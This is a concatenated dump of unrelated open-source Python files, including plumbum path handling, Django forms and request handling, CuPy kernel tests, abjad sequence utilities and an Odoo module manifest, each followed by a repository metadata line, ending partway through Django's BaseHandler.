raise TypeError("LocalPath cannot be constructed from %r" % (parts,))
self = super(LocalPath, cls).__new__(cls, os.path.normpath(os.path.join(*(str(p) for p in parts))))
return self
@property
def _path(self):
return str(self)
def _get_info(self):
return self._path
def __getstate__(self):
return {"_path" : self._path}
def _form(self, *parts):
return LocalPath(*parts)
@property
@_setdoc(Path)
def name(self):
return os.path.basename(str(self))
@property
@_setdoc(Path)
def dirname(self):
return LocalPath(os.path.dirname(str(self)))
@property
@_setdoc(Path)
def suffix(self):
return os.path.splitext(str(self))[1]
@property
def suffixes(self):
exts = []
base = str(self)
while True:
base, ext = os.path.splitext(base)
if ext:
exts.append(ext)
else:
return list(reversed(exts))
@property
@_setdoc(Path)
def uid(self):
uid = self.stat().st_uid
name = getpwuid(uid)[0]
return FSUser(uid, name)
@property
@_setdoc(Path)
def gid(self):
gid = self.stat().st_gid
name = getgrgid(gid)[0]
return FSUser(gid, name)
@_setdoc(Path)
def join(self, *others):
return LocalPath(self, *others)
@_setdoc(Path)
def list(self):
return [self / fn for fn in os.listdir(str(self))]
@_setdoc(Path)
def iterdir(self):
try:
return (self.__class__(fn.name) for fn in os.scandir(str(self)))
except NameError:
return (self / fn for fn in os.listdir(str(self)))
@_setdoc(Path)
def is_dir(self):
return os.path.isdir(str(self))
@_setdoc(Path)
def is_file(self):
return os.path.isfile(str(self))
@_setdoc(Path)
def is_symlink(self):
return os.path.islink(str(self))
@_setdoc(Path)
def exists(self):
return os.path.exists(str(self))
@_setdoc(Path)
def stat(self):
return os.stat(str(self))
@_setdoc(Path)
def with_name(self, name):
return LocalPath(self.dirname) / name
@property
@_setdoc(Path)
def stem(self):
return self.name.rsplit(os.path.extsep)[0]
@_setdoc(Path)
def with_suffix(self, suffix, depth=1):
if (suffix and not suffix.startswith(os.path.extsep) or suffix == os.path.extsep):
raise ValueError("Invalid suffix %r" % (suffix))
name = self.name
depth = len(self.suffixes) if depth is None else min(depth, len(self.suffixes))
for i in range(depth):
name, ext = os.path.splitext(name)
return LocalPath(self.dirname) / (name + suffix)
@_setdoc(Path)
def glob(self, pattern):
fn = lambda pat: [LocalPath(m) for m in glob.glob(str(self / pat))]
return self._glob(pattern, fn)
@_setdoc(Path)
def delete(self):
if not self.exists():
return
if self.is_dir():
shutil.rmtree(str(self))
else:
try:
os.remove(str(self))
except OSError:
# file might already been removed (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.ENOENT:
raise
@_setdoc(Path)
def move(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot move local path %s to %r" % (self, dst))
shutil.move(str(self), str(dst))
return LocalPath(dst)
@_setdoc(Path)
def copy(self, dst, override = False):
if isinstance(dst, RemotePath):
raise TypeError("Cannot copy local path %s to %r" % (self, dst))
dst = LocalPath(dst)
if override:
dst.delete()
if self.is_dir():
shutil.copytree(str(self), str(dst))
else:
dst_dir = LocalPath(dst).dirname
if not dst_dir.exists():
dst_dir.mkdir()
shutil.copy2(str(self), str(dst))
return dst
@_setdoc(Path)
def mkdir(self):
if not self.exists():
try:
os.makedirs(str(self))
except OSError:
# directory might already exist (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.EEXIST:
raise
@_setdoc(Path)
def open(self, mode = "rb"):
return open(str(self), mode)
@_setdoc(Path)
def read(self, encoding=None):
with self.open("rb") as f:
data = f.read()
if encoding:
data = data.decode(encoding)
return data
@_setdoc(Path)
def write(self, data, encoding=None):
if encoding:
data = data.encode(encoding)
with self.open("wb") as f:
f.write(data)
@_setdoc(Path)
def chown(self, owner = None, group = None, recursive = None):
if not hasattr(os, "chown"):
raise OSError("os.chown() not supported")
uid = self.uid if owner is None else (owner if isinstance(owner, int) else getpwnam(owner)[2])
gid = self.gid if group is None else (group if isinstance(group, int) else getgrnam(group)[2])
os.chown(str(self), uid, gid)
if recursive or (recursive is None and self.is_dir()):
for subpath in self.walk():
os.chown(str(subpath), uid, gid)
@_setdoc(Path)
def chmod(self, mode):
if not hasattr(os, "chmod"):
raise OSError("os.chmod() not supported")
os.chmod(str(self), mode)
@_setdoc(Path)
def access(self, mode = 0):
return os.access(str(self), self._access_mode_to_flags(mode))
@_setdoc(Path)
def link(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot create a hardlink from local path %s to %r" % (self, dst))
if hasattr(os, "link"):
os.link(str(self), str(dst))
else:
from plumbum.machines.local import local
# windows: use mklink
if self.is_dir():
local["cmd"]("/C", "mklink", "/D", "/H", str(dst), str(self))
else:
local["cmd"]("/C", "mklink", "/H", str(dst), str(self))
@_setdoc(Path)
def symlink(self, dst):
if isinstance(dst, RemotePath):
raise TypeError("Cannot create a symlink from local path %s to %r" % (self, dst))
if hasattr(os, "symlink"):
os.symlink(str(self), str(dst))
else:
from plumbum.machines.local import local
# windows: use mklink
if self.is_dir():
local["cmd"]("/C", "mklink", "/D", str(dst), str(self))
else:
local["cmd"]("/C", "mklink", str(dst), str(self))
@_setdoc(Path)
def unlink(self):
try:
if hasattr(os, "symlink") or not self.is_dir():
os.unlink(str(self))
else:
# windows: use rmdir for directories and directory symlinks
os.rmdir(str(self))
except OSError:
# file might already been removed (a race with other threads/processes)
_, ex, _ = sys.exc_info()
if ex.errno != errno.ENOENT:
raise
@_setdoc(Path)
def truncate(self, size):
with self.open("r+b") as f:
os.ftruncate(f.fileno(), size)
@_setdoc(Path)
def as_uri(self, scheme='file'):
return urlparse.urljoin(str(scheme)+':', urllib.pathname2url(str(self)))
@property
@_setdoc(Path)
def drive(self):
return os.path.splitdrive(str(self))[0]
@property
@_setdoc(Path)
def root(self):
return os.path.sep
class LocalWorkdir(LocalPath):
"""Working directory manipulator"""
def __hash__(self):
raise TypeError("unhashable type")
def __new__(cls):
return super(LocalWorkdir, cls).__new__(cls, os.getcwd())
def chdir(self, newdir):
"""Changes the current working directory to the given one
:param newdir: The destination director (a string or a ``LocalPath``)
"""
if isinstance(newdir, RemotePath):
raise TypeError("newdir cannot be %r" % (newdir,))
logger.debug("Chdir to %s", newdir)
os.chdir(str(newdir))
return self.__class__()
def getpath(self):
"""Returns the current working directory as a ``LocalPath`` object"""
return LocalPath(self._path)
@contextmanager
def __call__(self, newdir):
"""A context manager used to ``chdir`` into a directory and then ``chdir`` back to
the previous location; much like ``pushd``/``popd``.
:param newdir: The destination director (a string or a ``LocalPath``)
"""
prev = self._path
newdir = self.chdir(newdir)
try:
yield newdir
finally:
self.chdir(prev)
| weka-io/plumbum | plumbum/path/local.py | Python | mit | 10,605 |
# coding=utf-8
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os
import django.utils.translation.trans_real
from . import parser
class TranslationsLoader(object):
def __init__(self, locale_paths=(), locales=()):
self.locale_paths = locale_paths
self.locales = locales
super(TranslationsLoader, self).__init__()
def execute(self):
for locale in self.locales:
language = django.utils.translation.trans_real.to_language(locale)
# XXX: this will trigger useless loading of translations from django code
catalog = django.utils.translation.trans_real.translation(language)._catalog
catalog.clear()
for file_path in self._get_translation_files(locale):
catalog.update(parser.parse_po_filename(file_path))
def list_files(self):
for locale in self.locales:
for file_path in self._get_translation_files(locale):
yield file_path
def _get_translation_files(self, locale):
for locale_path in self.locale_paths:
translation_path = os.path.join(locale_path, locale, 'LC_MESSAGES/django.po')
if os.path.isfile(translation_path):
yield translation_path
| kmichel/po-localization | po_localization/translations_loader.py | Python | mit | 1,328 |
# -*- encoding: utf-8 -*_
def zip_sequences(sequences, cyclic=False, truncate=True):
r'''Zips `sequences`.
.. container:: example
Zips two `sequences` cyclically:
::
>>> sequences = [[1, 2, 3], ['a', 'b']]
>>> sequencetools.zip_sequences(sequences, cyclic=True)
[(1, 'a'), (2, 'b'), (3, 'a')]
.. container:: example
Zips three `sequences` cyclically:
::
>>> sequences = [[10, 11, 12], [20, 21], [30, 31, 32, 33]]
>>> sequencetools.zip_sequences(sequences, cyclic=True)
[(10, 20, 30), (11, 21, 31), (12, 20, 32), (10, 21, 33)]
.. container:: example
Zips sequences without truncation:
::
>>> sequences = ([1, 2, 3, 4], [11, 12, 13], [21, 22, 23])
>>> sequencetools.zip_sequences(sequences, truncate=False)
[(1, 11, 21), (2, 12, 22), (3, 13, 23), (4,)]
.. container:: example
Zips sequences noncyclically and with truncation.
Equivalent to built-in ``zip()``:
::
>>> sequences = ([1, 2, 3, 4], [11, 12, 13], [21, 22, 23])
>>> sequencetools.zip_sequences(sequences)
[(1, 11, 21), (2, 12, 22), (3, 13, 23)]
Returns list.
'''
if cyclic:
result = []
if not min(len(x) for x in sequences):
return result
max_length = max([len(x) for x in sequences])
for i in range(max_length):
part = []
for sequence in sequences:
index = i % len(sequence)
element = sequence[index]
part.append(element)
part = tuple(part)
result.append(part)
elif not truncate:
result = []
max_length = max([len(x) for x in sequences])
for i in range(max_length):
part = []
for sequence in sequences:
try:
part.append(sequence[i])
except IndexError:
pass
result.append(tuple(part))
elif truncate:
result = list(zip(*sequences))
return result | mscuthbert/abjad | abjad/tools/sequencetools/zip_sequences.py | Python | gpl-3.0 | 2,167 |
# oppia/profile/forms.py
import hashlib
import urllib
from django import forms
from django.conf import settings
from django.contrib.auth import (authenticate, login, views)
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.contrib.auth.models import User
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Button, Layout, Fieldset, ButtonHolder, Submit, Div, HTML
class LoginForm(forms.Form):
username = forms.CharField(max_length=30,
error_messages={'required': _(u'Please enter a username.')},)
password = forms.CharField(widget=forms.PasswordInput,
error_messages={'required': _(u'Please enter a password.'),},
required=True)
next = forms.CharField(widget=forms.HiddenInput())
def __init__(self, *args, **kwargs):
super(LoginForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_action = reverse('profile_login')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'username',
'password',
'next',
Div(
Submit('submit', _(u'Login'), css_class='btn btn-default'),
HTML("""<a class="btn btn-default" href="{% url 'profile_reset' %}">"""+_(u'Forgotten password?') + """</a>"""),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
username = cleaned_data.get("username")
password = cleaned_data.get("password")
user = authenticate(username=username, password=password)
if user is None or not user.is_active:
raise forms.ValidationError( _(u"Invalid username or password. Please try again."))
return cleaned_data
class RegisterForm(forms.Form):
username = forms.CharField(max_length=30,
min_length=4,
error_messages={'required': _(u'Please enter a username.')},)
email = forms.CharField(validators=[validate_email],
error_messages={'invalid': _(u'Please enter a valid e-mail address.'),
'required': _(u'Please enter your e-mail address.')},
required=True)
password = forms.CharField(widget=forms.PasswordInput,
error_messages={'required': _(u'Please enter a password.'),
'min_length': _(u'Your password should be at least 6 characters long.')},
min_length=6,
required=True)
password_again = forms.CharField(widget=forms.PasswordInput,
min_length=6,
error_messages={'required': _(u'Please enter your password again.'),
'min_length': _(u'Your password again should be at least 6 characters long.')},
required=True)
first_name = forms.CharField(max_length=100,
error_messages={'required': _(u'Please enter your first name.'),
'min_length': _(u'Your first name should be at least 2 characters long.')},
min_length=2,
required=True)
last_name = forms.CharField(max_length=100,
error_messages={'required': _(u'Please enter your last name.'),
'min_length': _(u'Your last name should be at least 2 characters long.')},
min_length=2,
required=True)
job_title = forms.CharField(max_length=100,required=False)
organisation = forms.CharField(max_length=100,required=False)
def __init__(self, *args, **kwargs):
super(RegisterForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_action = reverse('profile_register')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'username',
'email',
'password',
'password_again',
'first_name',
'last_name',
'job_title',
'organisation',
Div(
Submit('submit', _(u'Register'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
email = cleaned_data.get("email")
password = cleaned_data.get("password")
password_again = cleaned_data.get("password_again")
username = cleaned_data.get("username")
# check the username not already used
num_rows = User.objects.filter(username=username).count()
if num_rows != 0:
raise forms.ValidationError( _(u"Username has already been registered, please select another."))
# check the email address not already used
num_rows = User.objects.filter(email=email).count()
if num_rows != 0:
raise forms.ValidationError( _(u"Email has already been registered"))
# check the password are the same
if password and password_again:
if password != password_again:
raise forms.ValidationError( _(u"Passwords do not match."))
# Always return the full collection of cleaned data.
return cleaned_data
class ResetForm(forms.Form):
username = forms.CharField(max_length=30,
error_messages={'invalid': _(u'Please enter a username or email address.')},
required=True)
def __init__(self, *args, **kwargs):
super(ResetForm, self).__init__(*args, **kwargs)
self.fields['username'].label = "Username or email"
self.helper = FormHelper()
self.helper.form_action = reverse('profile_reset')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'username',
Div(
Submit('submit', _(u'Reset password'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
username = cleaned_data.get("username")
try:
user = User.objects.get(username__exact=username)
except User.DoesNotExist:
try:
user = User.objects.get(email__exact=username)
except User.DoesNotExist:
raise forms.ValidationError( _(u"Username/email not found"))
return cleaned_data
class ProfileForm(forms.Form):
api_key = forms.CharField(widget = forms.TextInput(attrs={'readonly':'readonly'}),
required=False, help_text=_(u'You cannot edit the API Key.'))
username = forms.CharField(widget = forms.TextInput(attrs={'readonly':'readonly'}),
required=False, help_text=_(u'You cannot edit the username.'))
email = forms.CharField(validators=[validate_email],
error_messages={'invalid': _(u'Please enter a valid e-mail address.')},
required=True)
password = forms.CharField(widget=forms.PasswordInput,
required=False,
min_length=6,
error_messages={'min_length': _(u'The new password should be at least 6 characters long')},)
password_again = forms.CharField(widget=forms.PasswordInput,
required=False,
min_length=6)
first_name = forms.CharField(max_length=100,
min_length=2,
required=True)
last_name = forms.CharField(max_length=100,
min_length=2,
required=True)
job_title = forms.CharField(max_length=100,required=False)
organisation = forms.CharField(max_length=100,required=False)
def __init__(self, *args, **kwargs):
super(ProfileForm, self).__init__(*args, **kwargs)
if len(args) == 1:
email = args[0]['email']
username = args[0]['username']
else:
kw = kwargs.pop('initial')
email = kw['email']
username = kw['username']
self.helper = FormHelper()
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
if settings.OPPIA_SHOW_GRAVATARS:
gravatar_url = "https://www.gravatar.com/avatar.php?"
gravatar_url += urllib.urlencode({
'gravatar_id':hashlib.md5(email).hexdigest(),
'size':64
})
self.helper.layout = Layout(
Div(
HTML("""<label class="control-label col-lg-2">"""+_(u'Photo') + """</label>"""),
Div(
HTML(mark_safe('<img src="{0}" alt="gravatar for {1}" class="gravatar" width="{2}" height="{2}"/>'.format(gravatar_url, username, 64))),
HTML("""<br/>"""),
HTML("""<a href="https://www.gravatar.com">"""+_(u'Update gravatar')+"""</a>"""),
css_class="col-lg-4",
),
css_class="form-group",
),
'api_key',
'username',
'email',
'first_name',
'last_name',
'job_title',
'organisation',
Div(
HTML("""<h3>"""+_(u'Change password') + """</h3>"""),
),
'password',
'password_again',
Div(
Submit('submit', _(u'Save'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
else:
self.helper.layout = Layout(
'api_key',
'username',
'email',
'first_name',
'last_name',
Div(
HTML("""<h3>"""+_(u'Change password') + """</h3>"""),
),
'password',
'password_again',
Div(
Submit('submit', _(u'Save'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
def clean(self):
cleaned_data = self.cleaned_data
# check email not used by anyone else
email = cleaned_data.get("email")
username = cleaned_data.get("username")
num_rows = User.objects.exclude(username__exact=username).filter(email=email).count()
if num_rows != 0:
raise forms.ValidationError( _(u"Email address already in use"))
# if password entered then check they are the same
password = cleaned_data.get("password")
password_again = cleaned_data.get("password_again")
if password and password_again:
if password != password_again:
raise forms.ValidationError( _(u"Passwords do not match."))
return cleaned_data
class UploadProfileForm(forms.Form):
upload_file = forms.FileField(
required=True,
error_messages={'required': _('Please select a file to upload')},)
def __init__(self, *args, **kwargs):
super(UploadProfileForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_action = reverse('profile_upload')
self.helper.form_class = 'form-horizontal'
self.helper.label_class = 'col-lg-2'
self.helper.field_class = 'col-lg-4'
self.helper.layout = Layout(
'upload_file',
Div(
Submit('submit', _(u'Upload'), css_class='btn btn-default'),
css_class='col-lg-offset-2 col-lg-4',
),
)
| DigitalCampus/django-instrat-oppia | oppia/profile/forms.py | Python | gpl-3.0 | 13,649 |
import pytest
import watchmaker
@pytest.fixture
def setup_object():
pass
def test_main():
"""Placeholder for tests"""
# Placeholder
assert watchmaker.__version__ == watchmaker.__version__
| MarionTheBull/watchmaker | tests/test_watchmaker.py | Python | apache-2.0 | 209 |
import unittest
import numpy
import pytest
import cupy
from cupy import testing
from cupy.cuda import runtime
from cupy.cuda.texture import (ChannelFormatDescriptor, CUDAarray,
ResourceDescriptor, TextureDescriptor,
TextureObject,)
class TestUserkernel(unittest.TestCase):
def test_manual_indexing(self, n=100):
in1 = cupy.random.uniform(-1, 1, n).astype(cupy.float32)
in2 = cupy.random.uniform(-1, 1, n).astype(cupy.float32)
uesr_kernel_1 = cupy.ElementwiseKernel(
'T x, T y',
'T z',
'''
z = x + y;
''',
'uesr_kernel_1')
out1 = uesr_kernel_1(in1, in2)
uesr_kernel_2 = cupy.ElementwiseKernel(
'raw T x, raw T y',
'raw T z',
'''
z[i] = x[i] + y[i];
''',
'uesr_kernel_2')
out2 = uesr_kernel_2(in1, in2, size=n)
testing.assert_array_equal(out1, out2)
def test_python_scalar(self):
for typ in (int, float, bool):
dtype = numpy.dtype(typ).type
in1_cpu = numpy.random.randint(0, 1, (4, 5)).astype(dtype)
in1 = cupy.array(in1_cpu)
scalar_value = typ(2)
uesr_kernel_1 = cupy.ElementwiseKernel(
'T x, T y',
'T z',
'''
z = x + y;
''',
'uesr_kernel_1')
out1 = uesr_kernel_1(in1, scalar_value)
expected = in1_cpu + dtype(2)
testing.assert_array_equal(out1, expected)
@testing.for_all_dtypes()
def test_numpy_scalar(self, dtype):
in1_cpu = numpy.random.randint(0, 1, (4, 5)).astype(dtype)
in1 = cupy.array(in1_cpu)
scalar_value = dtype(2)
uesr_kernel_1 = cupy.ElementwiseKernel(
'T x, T y',
'T z',
'''
z = x + y;
''',
'uesr_kernel_1')
out1 = uesr_kernel_1(in1, scalar_value)
expected = in1_cpu + dtype(2)
testing.assert_array_equal(out1, expected)
class TestElementwiseKernelSize(unittest.TestCase):
# Tests to check whether size argument raises ValueError correctly
# depending on the raw specifiers of a user kernel.
def setUp(self):
self.arr1 = cupy.array([1, 2], dtype='float32')
self.arr2 = cupy.array([3, 4], dtype='float32')
def raises_size_not_allowed(self):
return pytest.raises(ValueError, match=r'^Specified \'size\' can')
def raises_size_required(self):
return pytest.raises(ValueError, match=r'^Loop size is undecided\.')
def create_kernel(self, input_raw, output_raw):
# Creates a no-op kernel with given parameter specification.
# input_raw and output_raw are tuples of True/False whose
# corresponding parameter will be designated as 'raw' if True.
input_types = (
', '.join([
'{}float32 x{}'.format(
('raw ' if raw else ''), i)
for i, raw in enumerate(input_raw)]))
output_types = (
', '.join([
'{}float32 y{}'.format(
('raw ' if raw else ''), i)
for i, raw in enumerate(output_raw)]))
return cupy.ElementwiseKernel(input_types, output_types, '', 'kernel')
def test_all_raws(self):
# Input arrays are all raw -> size required
kernel1 = self.create_kernel((True, True), (False,))
kernel1(self.arr1, self.arr2, size=2)
with self.raises_size_required():
kernel1(self.arr1, self.arr2)
kernel2 = self.create_kernel((True, True), (True,))
kernel2(self.arr1, self.arr2, size=2)
with self.raises_size_required():
kernel2(self.arr1, self.arr2)
def test_all_nonraws(self):
# All arrays are not raw -> size not allowed
kernel1 = self.create_kernel((False, False), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, self.arr2, size=2)
kernel2 = self.create_kernel((False, False), (True,))
with self.raises_size_not_allowed():
kernel2(self.arr1, self.arr2, size=2)
def test_some_nonraws(self):
# Some arrays are not raw -> size not allowed
kernel1 = self.create_kernel((True, False), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, self.arr2, size=2)
kernel2 = self.create_kernel((False, True), (False,))
with self.raises_size_not_allowed():
kernel2(self.arr1, self.arr2, size=2)
kernel3 = self.create_kernel((True, False), (True,))
with self.raises_size_not_allowed():
kernel3(self.arr1, self.arr2, size=2)
kernel4 = self.create_kernel((False, True), (True,))
with self.raises_size_not_allowed():
kernel4(self.arr1, self.arr2, size=2)
def test_scalars_and_nonraws(self):
# Combination of scalars and non-raw arrays -> size not allowed
kernel1 = self.create_kernel((False, False), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, 7, size=2)
kernel2 = self.create_kernel((False, False), (False,))
with self.raises_size_not_allowed():
kernel2(7, self.arr1, size=2)
kernel3 = self.create_kernel((False, False), (True,))
with self.raises_size_not_allowed():
kernel3(self.arr1, 7, size=2)
kernel4 = self.create_kernel((False, False), (True,))
with self.raises_size_not_allowed():
kernel4(7, self.arr1, size=2)
def test_scalars_and_raws_and_nonraws(self):
# Combination of scalars and raw arrays and non-raw arrays
# -> size not allowed
kernel1 = self.create_kernel((False, False, True), (False,))
with self.raises_size_not_allowed():
kernel1(self.arr1, 7, self.arr2, size=2)
kernel2 = self.create_kernel((False, False, True), (True,))
with self.raises_size_not_allowed():
kernel2(self.arr1, 7, self.arr2, size=2)
def test_scalars_and_raws(self):
# Combination of scalars and raw arrays -> size required
kernel1 = self.create_kernel((True, False), (False,))
kernel1(self.arr1, 7, size=2)
with self.raises_size_required():
kernel1(self.arr1, 7)
kernel2 = self.create_kernel((False, True), (False,))
kernel2(7, self.arr1, size=2)
with self.raises_size_required():
kernel2(7, self.arr1)
kernel3 = self.create_kernel((True, False), (True,))
kernel3(self.arr1, 7, size=2)
with self.raises_size_required():
kernel3(self.arr1, 7)
kernel4 = self.create_kernel((False, True), (True,))
kernel4(7, self.arr1, size=2)
with self.raises_size_required():
kernel4(7, self.arr1)
def test_size_determined_by_output(self):
# All the input args are unsized, but the size can be determined by the
# output arg. size argument is not allowed.
# Raw input
kernel1 = self.create_kernel((True,), (False,))
kernel1(self.arr1, self.arr2)
with self.raises_size_not_allowed():
kernel1(self.arr1, self.arr2, size=2)
# Scalar input
kernel2 = self.create_kernel((False,), (False,))
kernel2(self.arr1, self.arr2)
with self.raises_size_not_allowed():
kernel2(7, self.arr2, size=2)
# No input
kernel3 = self.create_kernel((), (False,))
kernel3(self.arr1)
with self.raises_size_not_allowed():
kernel3(self.arr1, size=2)
def test_no_input_and_raw_output(self):
# No input and the given output is raw -> size required
kernel1 = self.create_kernel((), (True,))
kernel1(self.arr1, size=2)
with self.raises_size_required():
kernel1(self.arr1)
@testing.parameterize(*testing.product({
'value': [-1, 2 ** 32, 2 ** 63 - 1, -(2 ** 63)],
}))
class TestUserkernelScalar(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_scalar(self, xp, dtype):
x = testing.shaped_arange((2, 3, 4), xp, dtype)
if xp is numpy:
y = numpy.array(self.value).astype(dtype)
return x + y
else:
kernel = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
return kernel(x, self.value)
class TestUserkernelManualBlockSize(unittest.TestCase):
def test_invalid_block_size(self):
x = testing.shaped_arange((2, 3, 4), cupy, cupy.float32)
kernel = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
with pytest.raises(ValueError):
kernel(x, 1, block_size=0)
def test_block_size(self):
x = testing.shaped_arange((2, 3, 4), cupy, cupy.float32)
kernel = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
y = kernel(x, 1, block_size=1)
testing.assert_array_equal(y, x + 1)
@testing.parameterize(*testing.product({
'dimensions': ((64, 0, 0), (64, 32, 0), (64, 32, 19)),
}))
@testing.gpu
@pytest.mark.skipif(runtime.is_hip,
reason='texture support on HIP is not yet implemented')
class TestElementwiseKernelTexture(unittest.TestCase):
def _prep_texture(self):
width, height, depth = self.dimensions
dim = 3 if depth != 0 else 2 if height != 0 else 1
# generate input data and allocate output buffer
shape = (depth, height, width) if dim == 3 else \
(height, width) if dim == 2 else \
(width,)
self.shape = shape
# prepare input, output, and texture memory
# self.data holds the data stored in the texture memory
tex_data = cupy.random.random(shape, dtype=cupy.float32)
ch = ChannelFormatDescriptor(32, 0, 0, 0,
runtime.cudaChannelFormatKindFloat)
arr = CUDAarray(ch, width, height, depth)
arr.copy_from(tex_data)
self.data = tex_data
# create resource and texture descriptors
res = ResourceDescriptor(runtime.cudaResourceTypeArray, cuArr=arr)
address_mode = (runtime.cudaAddressModeClamp,
runtime.cudaAddressModeClamp)
tex = TextureDescriptor(address_mode, runtime.cudaFilterModePoint,
runtime.cudaReadModeElementType)
# create a texture object
return TextureObject(res, tex)
def _prep_kernel1D(self):
return cupy.ElementwiseKernel(
'T x, U texObj',
'T y',
'''
T temp = tex1D<T>(texObj,
float(i)
);
y = temp + x;
''', name='test_tex1D')
def _prep_kernel2D(self):
return cupy.ElementwiseKernel(
'T x, U texObj, uint64 width',
'T y',
'''
T temp = tex2D<T>(texObj,
(float)(i % width),
(float)(i / width)
);
y = temp + x;
''', name='test_tex2D')
def _prep_kernel3D(self):
return cupy.ElementwiseKernel(
'T x, U texObj, uint64 width, uint64 height',
'T y',
'''
T temp = tex3D<T>(texObj,
(float)((i % (width * height)) % width),
(float)((i % (width * height)) / width),
(float)((i / (width * height)))
);
y = temp + x;
''', name='test_tex3D')
def test_texture_input(self):
width, height, depth = self.dimensions
dim = 3 if depth != 0 else 2 if height != 0 else 1
texobj = self._prep_texture()
ker = getattr(self, f'_prep_kernel{dim}D')()
# prepare input
args = [None, texobj]
size = width
if height > 0:
size *= height
args.append(width)
if depth > 0:
size *= depth
args.append(height)
in_arr = cupy.arange(size, dtype=cupy.float32)
in_arr = in_arr.reshape(self.shape)
args[0] = in_arr
# compute and validate output
out_arr = ker(*args)
expected = in_arr + self.data
testing.assert_allclose(out_arr, expected)
| cupy/cupy | tests/cupy_tests/core_tests/test_userkernel.py | Python | mit | 12,653 |
__author__ = 'Yunxi Lin'
from pages.BasePage import BasePage
class ApprovalPage(BasePage):
def print_display(self):
self.logger.info('Approved Page displayed') | jchen7960/python_framework | pages/ApprovalPage.py | Python | mit | 172 |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# This module is Copyright (c) 2009-2013 General Solutions (http://gscom.vn) All Rights Reserved.
{
"name" : "Vietnam Chart of Accounts",
"version" : "1.0",
"author" : "General Solutions",
'website': 'http://gscom.vn',
"category" : "Localization/Account Charts",
"description": """
This is the module to manage the accounting chart for Vietnam in OpenERP.
=========================================================================
This module applies to companies based in Vietnamese Accounting Standard (VAS).
**Credits:** General Solutions.
""",
"depends" : ["account","base_vat","base_iban"],
"data" : ["account_chart.xml","account_tax.xml","account_chart_template.yml"],
"demo" : [],
"installable": True,
}
| tvtsoft/odoo8 | addons/l10n_vn/__openerp__.py | Python | agpl-3.0 | 853 |
import sys
from django import http
from django.core import signals
from django.utils.encoding import force_unicode
from django.utils.importlib import import_module
from django.utils.log import getLogger
logger = getLogger('django.request')
class BaseHandler(object):
# Changes that are always applied to a response (in this order).
response_fixes = [
http.fix_location_header,
http.conditional_content_removal,
http.fix_IE_for_attach,
http.fix_IE_for_vary,
]
def __init__(self):
self._request_middleware = self._view_middleware = self._template_response_middleware = self._response_middleware = self._exception_middleware = None
def load_middleware(self):
"""
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
"""
from django.conf import settings
from django.core import exceptions
self._view_middleware = []
self._template_response_middleware = []
self._response_middleware = []
self._exception_middleware = []
request_middleware = []
for middleware_path in settings.MIDDLEWARE_CLASSES:
try:
mw_module, mw_classname = middleware_path.rsplit('.', 1)
except ValueError:
raise exceptions.ImproperlyConfigured('%s isn\'t a middleware module' % middleware_path)
try:
mod = import_module(mw_module)
except ImportError as e:
raise exceptions.ImproperlyConfigured('Error importing middleware %s: "%s"' % (mw_module, e))
try:
mw_class = getattr(mod, mw_classname)
except AttributeError:
raise exceptions.ImproperlyConfigured('Middleware module "%s" does not define a "%s" class' % (mw_module, mw_classname))
try:
mw_instance = mw_class()
except exceptions.MiddlewareNotUsed:
continue
if hasattr(mw_instance, 'process_request'):
request_middleware.append(mw_instance.process_request)
if hasattr(mw_instance, 'process_view'):
self._view_middleware.append(mw_instance.process_view)
if hasattr(mw_instance, 'process_template_response'):
self._template_response_middleware.insert(0, mw_instance.process_template_response)
if hasattr(mw_instance, 'process_response'):
self._response_middleware.insert(0, mw_instance.process_response)
if hasattr(mw_instance, 'process_exception'):
self._exception_middleware.insert(0, mw_instance.process_exception)
# We only assign to this when initialization is complete as it is used
# as a flag for initialization being complete.
self._request_middleware = request_middleware
def get_response(self, request):
"Returns an HttpResponse object for the given HttpRequest"
from django.core import exceptions, urlresolvers
from django.conf import settings
try:
# Setup default url resolver for this thread, this code is outside
# the try/except so we don't get a spurious "unbound local
# variable" exception in the event an exception is raised before
# resolver is set
urlconf = settings.ROOT_URLCONF
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
try:
response = None
# Apply request middleware
for middleware_method in self._request_middleware:
response = middleware_method(request)
if response:
break
if response is None:
if hasattr(request, "urlconf"):
# Reset url resolver with a custom urlconf.
urlconf = request.urlconf
